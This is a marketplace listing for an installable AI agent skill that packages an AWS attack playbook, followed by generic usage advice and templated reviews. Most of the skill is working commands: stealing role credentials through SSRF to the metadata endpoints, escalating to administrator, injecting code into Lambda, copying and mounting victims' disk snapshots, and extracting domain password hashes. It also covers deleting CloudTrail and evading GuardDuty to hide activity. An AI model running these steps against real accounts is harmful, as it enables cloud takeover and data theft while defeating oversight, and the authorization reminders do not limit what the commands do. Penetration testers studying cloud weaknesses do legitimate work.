aws-penetration-testing▌
davila7/claude-code-templates · updated Apr 8, 2026
MDX-style export adds YAML metadata + attribution linking explainx.ai and this canonical listing URL.
Provide comprehensive techniques for penetration testing AWS cloud environments. Covers IAM enumeration, privilege escalation, SSRF to metadata endpoint, S3 bucket exploitation, Lambda code extraction, and persistence techniques for red team operations.
AWS Penetration Testing
Purpose
Provide comprehensive techniques for penetration testing AWS cloud environments. Covers IAM enumeration, privilege escalation, SSRF to metadata endpoint, S3 bucket exploitation, Lambda code extraction, and persistence techniques for red team operations.
Inputs/Prerequisites
- AWS CLI configured with credentials
- Valid AWS credentials (even low-privilege)
- Understanding of AWS IAM model
- Python 3, boto3 library
- Tools: Pacu, Prowler, ScoutSuite, SkyArk
Outputs/Deliverables
- IAM privilege escalation paths
- Extracted credentials and secrets
- Compromised EC2/Lambda/S3 resources
- Persistence mechanisms
- Security audit findings
Essential Tools
| Tool | Purpose | Installation |
|---|---|---|
| Pacu | AWS exploitation framework | git clone https://github.com/RhinoSecurityLabs/pacu |
| SkyArk | Shadow Admin discovery | Import-Module .\SkyArk.ps1 |
| Prowler | Security auditing | pip install prowler |
| ScoutSuite | Multi-cloud auditing | pip install scoutsuite |
| enumerate-iam | Permission enumeration | git clone https://github.com/andresriancho/enumerate-iam |
| Principal Mapper | IAM analysis | pip install principalmapper |
Core Workflow
Step 1: Initial Enumeration
Identify the compromised identity and permissions:
# Check current identity
aws sts get-caller-identity
# Configure profile
aws configure --profile compromised
# List access keys
aws iam list-access-keys
# Enumerate permissions
./enumerate-iam.py --access-key AKIA... --secret-key StF0q...
Step 2: IAM Enumeration
# List all users
aws iam list-users
# List groups for user
aws iam list-groups-for-user --user-name TARGET_USER
# List attached policies
aws iam list-attached-user-policies --user-name TARGET_USER
# List inline policies
aws iam list-user-policies --user-name TARGET_USER
# Get policy details
aws iam get-policy --policy-arn POLICY_ARN
aws iam get-policy-version --policy-arn POLICY_ARN --version-id v1
# List roles
aws iam list-roles
aws iam list-attached-role-policies --role-name ROLE_NAME
Step 3: Metadata SSRF (EC2)
Exploit SSRF to access metadata endpoint (IMDSv1):
# Access metadata endpoint
http://169.254.169.254/latest/meta-data/
# Get IAM role name
http://169.254.169.254/latest/meta-data/iam/security-credentials/
# Extract temporary credentials
http://169.254.169.254/latest/meta-data/iam/security-credentials/ROLE-NAME
# Response contains:
{
"AccessKeyId": "ASIA...",
"SecretAccessKey": "...",
"Token": "...",
"Expiration": "2019-08-01T05:20:30Z"
}
For IMDSv2 (token required):
# Get token first
TOKEN=$(curl -X PUT -H "X-aws-ec2-metadata-token-ttl-seconds: 21600" \
"http://169.254.169.254/latest/api/token")
# Use token for requests
curl -H "X-aws-ec2-metadata-token:$TOKEN" \
"http://169.254.169.254/latest/meta-data/iam/security-credentials/"
Fargate Container Credentials:
# Read environment for credential path
/proc/self/environ
# Look for: AWS_CONTAINER_CREDENTIALS_RELATIVE_URI=/v2/credentials/...
# Access credentials
http://169.254.170.2/v2/credentials/CREDENTIAL-PATH
Privilege Escalation Techniques
Shadow Admin Permissions
These permissions are equivalent to administrator:
| Permission | Exploitation |
|---|---|
iam:CreateAccessKey |
Create keys for admin user |
iam:CreateLoginProfile |
Set password for any user |
iam:AttachUserPolicy |
Attach admin policy to self |
iam:PutUserPolicy |
Add inline admin policy |
iam:AddUserToGroup |
Add self to admin group |
iam:PassRole + ec2:RunInstances |
Launch EC2 with admin role |
lambda:UpdateFunctionCode |
Inject code into Lambda |
Create Access Key for Another User
aws iam create-access-key --user-name target_user
Attach Admin Policy
aws iam attach-user-policy --user-name my_username \
--policy-arn arn:aws:iam::aws:policy/AdministratorAccess
Add Inline Admin Policy
aws iam put-user-policy --user-name my_username \
--policy-name admin_policy \
--policy-document file://admin-policy.json
Lambda Privilege Escalation
# code.py - Inject into Lambda function
import boto3
def lambda_handler(event, context):
client = boto3.client('iam')
response = client.attach_user_policy(
UserName='my_username',
PolicyArn="arn:aws:iam::aws:policy/AdministratorAccess"
)
return response
# Update Lambda code
aws lambda update-function-code --function-name target_function \
--zip-file fileb://malicious.zip
S3 Bucket Exploitation
Bucket Discovery
# Using bucket_finder
./bucket_finder.rb wordlist.txt
./bucket_finder.rb --download --region us-east-1 wordlist.txt
# Common bucket URL patterns
https://{bucket-name}.s3.amazonaws.com
https://s3.amazonaws.com/{bucket-name}
Bucket Enumeration
# List buckets (with creds)
aws s3 ls
# List bucket contents
aws s3 ls s3://bucket-name --recursive
# Download all files
aws s3 sync s3://bucket-name ./local-folder
Public Bucket Search
https://buckets.grayhatwarfare.com/
Lambda Exploitation
# List Lambda functions
aws lambda list-functions
# Get function code
aws lambda get-function --function-name FUNCTION_NAME
# Download URL provided in response
# Invoke function
aws lambda invoke --function-name FUNCTION_NAME output.txt
SSM Command Execution
Systems Manager allows command execution on EC2 instances:
# List managed instances
aws ssm describe-instance-information
# Execute command
aws ssm send-command --instance-ids "i-0123456789" \
--document-name "AWS-RunShellScript" \
--parameters commands="whoami"
# Get command output
aws ssm list-command-invocations --command-id "CMD-ID" \
--details --query "CommandInvocations[].CommandPlugins[].Output"
EC2 Exploitation
Mount EBS Volume
# Create snapshot of target volume
aws ec2 create-snapshot --volume-id vol-xxx --description "Audit"
# Create volume from snapshot
aws ec2 create-volume --snapshot-id snap-xxx --availability-zone us-east-1a
# Attach to attacker instance
aws ec2 attach-volume --volume-id vol-xxx --instance-id i-xxx --device /dev/xvdf
# Mount and access
sudo mkdir /mnt/stolen
sudo mount /dev/xvdf1 /mnt/stolen
Shadow Copy Attack (Windows DC)
# CloudCopy technique
# 1. Create snapshot of DC volume
# 2. Share snapshot with attacker account
# 3. Mount in attacker instance
# 4. Extract NTDS.dit and SYSTEM
secretsdump.py -system ./SYSTEM -ntds ./ntds.dit local
Console Access from API Keys
Convert CLI credentials to console access:
git clone https://github.com/NetSPI/aws_consoler
aws_consoler -v -a AKIAXXXXXXXX -s SECRETKEY
# Generates signin URL for console access
Covering Tracks
Disable CloudTrail
# Delete trail
aws cloudtrail delete-trail --name trail_name
# Disable global events
aws cloudtrail update-trail --name trail_name \
--no-include-global-service-events
# Disable specific region
aws cloudtrail update-trail --name trail_name \
--no-include-global-service-events --no-is-multi-region-trail
Note: Kali/Parrot/Pentoo Linux triggers GuardDuty alerts based on user-agent. Use Pacu which modifies the user-agent.
Quick Reference
| Task | Command |
|---|---|
| Get identity | aws sts get-caller-identity |
| List users | aws iam list-users |
| List roles | aws iam list-roles |
| List buckets | aws s3 ls |
| List EC2 | aws ec2 describe-instances |
| List Lambda | aws lambda list-functions |
| Get metadata | curl http://169.254.169.254/latest/meta-data/ |
Constraints
Must:
- Obtain written authorization before testing
- Document all actions for audit trail
- Test in scope resources only
Must Not:
- Modify production data without approval
- Leave persistent backdoors without documentation
- Disable security controls permanently
Should:
- Check for IMDSv2 before attempting metadata attacks
- Enumerate thoroughly before exploitation
- Clean up test resources after engagement
Examples
Example 1: SSRF to Admin
# 1. Find SSRF vulnerability in web app
https://app.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/
# 2. Get role name from response
# 3. Extract credentials
https://app.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/AdminRole
# 4. Configure AWS CLI with stolen creds
export AWS_ACCESS_KEY_ID=ASIA...
export AWS_SECRET_ACCESS_KEY=...
export AWS_SESSION_TOKEN=...
# 5. Verify access
aws sts get-caller-identity
Troubleshooting
| Issue | Solution |
|---|---|
| Access Denied on all commands | Enumerate permissions with enumerate-iam |
| Metadata endpoint blocked | Check for IMDSv2, try container metadata |
| GuardDuty alerts | Use Pacu with custom user-agent |
| Expired credentials | Re-fetch from metadata (temp creds rotate) |
| CloudTrail logging actions | Consider disable or log obfuscation |
Additional Resources
For advanced techniques including Lambda/API Gateway exploitation, Secrets Manager & KMS, Container security (ECS/EKS/ECR), RDS/DynamoDB exploitation, VPC lateral movement, and security checklists, see
How to use aws-penetration-testing on Cursor
AI-first code editor with Composer
Prerequisites
Before installing skills in Cursor, ensure your development environment meets these requirements:
- ›Cursor installed and configured on your development machine
- ›Node.js version 16.0+ with npm package manager (verify with
node --version) - ›Active project directory or workspace where you want to add aws-penetration-testing
Execute installation command
Execute the skills CLI command in your project's root directory to begin installation:
The skills CLI fetches aws-penetration-testing from GitHub repository davila7/claude-code-templates and configures it for Cursor.
Select Cursor when prompted
The CLI will show a list of available agents. Use arrow keys to navigate and space to select Cursor:
Verify installation
Confirm successful installation by checking the skill directory location:
Reload or restart Cursor to activate aws-penetration-testing. Access the skill through slash commands (e.g., /aws-penetration-testing) or your agent's skill management interface.
Security & Verification Notice
We perform automated surface-level scans (Gen AI Scanner, Socket, Snyk) during installation. These checks detect common vulnerabilities but do not guarantee complete security. Always review skill source code and verify the publisher's reputation before production use.
Skills execute code in your development environment. Always verify the publisher's identity, review recent commits, and test in isolated environments before production deployment.
List & Monetize Your Skill
Submit your Claude Code skill and start earning
Use Cases▌
Task Automation & Efficiency
Automate repetitive workflows and reduce manual effort
Example
Generate reports, summarize documents, draft communications
Save 3-5 hours per week on routine tasks
Knowledge Enhancement
Learn new skills, understand complex topics, get expert guidance
Example
Explain concepts, provide examples, suggest learning resources
Accelerate learning and skill development by 2x
Quality Improvement
Enhance output quality through reviews, suggestions, and refinements
Example
Review drafts, suggest improvements, catch errors
Improve work quality by 30-40% with less effort
Implementation Guide▌
Prerequisites
- ›Claude Desktop or compatible AI client with skill support
- ›Clear understanding of task or problem to solve
- ›Willingness to iterate and refine outputs
Time Estimate
15-45 minutes depending on use case complexity
Installation Steps
- 1.Install skill using provided installation command
- 2.Test with simple use case relevant to your work
- 3.Evaluate output quality and relevance
- 4.Iterate on prompts to improve results
- 5.Integrate into regular workflow if valuable
Common Pitfalls
- ⚠Expecting perfect results without iteration
- ⚠Not providing enough context in prompts
- ⚠Using skill for tasks outside its intended scope
- ⚠Accepting outputs without review and validation
Best Practices▌
✓ Do
- +Start with clear, specific prompts
- +Provide relevant context and constraints
- +Review and refine all outputs before using
- +Iterate to improve output quality
- +Document successful prompt patterns
✗ Don't
- −Don't use without understanding skill limitations
- −Don't skip validation of outputs
- −Don't share sensitive information in prompts
- −Don't expect skill to replace human judgment
💡 Pro Tips
- ★Be specific about desired format and style
- ★Ask for multiple options to choose from
- ★Request explanations to understand reasoning
- ★Combine AI efficiency with human expertise
When to Use This▌
✓ Use When
Use when skill capabilities match your task, clear ROI on time saved, and you can validate outputs. Best for repetitive tasks, learning, and quality improvement.
✗ Avoid When
Avoid when task requires deep expertise you can't validate, involves sensitive decisions, or when learning process is more valuable than speed of completion.
Learning Path▌
- 1Familiarize yourself with skill capabilities and limitations
- 2Start with low-risk, non-critical tasks
- 3Progress to more complex and valuable use cases
- 4Build expertise through regular use and experimentation
Discussion
Product Hunt–style comments (not star reviews)- No comments yet — start the thread.
Ratings
4.5★★★★★43 reviews- ★★★★★Hassan Thomas· Dec 28, 2024
Keeps context tight: aws-penetration-testing is the kind of skill you can hand to a new teammate without a long onboarding doc.
- ★★★★★Emma Wang· Dec 24, 2024
aws-penetration-testing has been reliable in day-to-day use. Documentation quality is above average for community skills.
- ★★★★★Chaitanya Patil· Dec 4, 2024
I recommend aws-penetration-testing for anyone iterating fast on agent tooling; clear intent and a small, reviewable surface area.
- ★★★★★Anaya Park· Nov 27, 2024
aws-penetration-testing reduced setup friction for our internal harness; good balance of opinion and flexibility.
- ★★★★★Piyush G· Nov 23, 2024
aws-penetration-testing fits our agent workflows well — practical, well scoped, and easy to wire into existing repos.
- ★★★★★Arjun Nasser· Nov 19, 2024
aws-penetration-testing is among the better-maintained entries we tried; worth keeping pinned for repeat workflows.
- ★★★★★Zara Johnson· Nov 15, 2024
Solid pick for teams standardizing on skills: aws-penetration-testing is focused, and the summary matches what you get after install.
- ★★★★★Evelyn Abbas· Oct 18, 2024
aws-penetration-testing is among the better-maintained entries we tried; worth keeping pinned for repeat workflows.
- ★★★★★Shikha Mishra· Oct 14, 2024
aws-penetration-testing has been reliable in day-to-day use. Documentation quality is above average for community skills.
- ★★★★★Anika Sanchez· Oct 10, 2024
aws-penetration-testing reduced setup friction for our internal harness; good balance of opinion and flexibility.
showing 1-10 of 43